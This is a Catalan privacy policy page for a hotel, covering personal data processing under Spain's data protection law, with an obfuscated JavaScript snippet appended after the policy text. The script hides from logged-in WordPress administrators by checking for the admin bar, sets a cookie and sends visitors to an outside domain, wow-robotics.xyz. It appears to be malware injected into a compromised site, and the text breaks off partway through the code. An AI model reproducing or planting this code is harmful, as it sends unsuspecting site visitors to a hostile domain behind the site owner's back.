Política de Privacitat

USOS DE DADES FACILITADES PER L’USUARI

Sempre que l’usuari faciliti les seves dades de caràcter personal a HOTEL MAS BOSCH 1526 està consentint el tractament de les mateixes en els termes que es detallen a continuació.

HOTEL MAS BOSCH 1526 tractarà i incorporarà les dades facilitades per l’usuari a uns fitxers, amb la finalitat exclusiva i única de poder prestar i oferir i donar tràmit als serveis respectius previstos al web www.hotelmasbosch1526.com.

En compliment de la Llei Orgànica 15/1999, de Protecció de Dades de Caràcter Personal, les dades recollides als formularis s’utilitzaran per a la finalitat descrita en els mateixos. Si l’usuari no desitja rebre informació sobre els serveis o desitja exercir els seus drets d’accés, rectificació i cancel·lació de continguts en l’esmentat fitxer, preguem que ens ho comuniqui a l’adreça electrònica següent: info@salvadorg56.sg-host.com, indicant la referència “LOPD HOTEL MAS BOSCH 1526”.

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m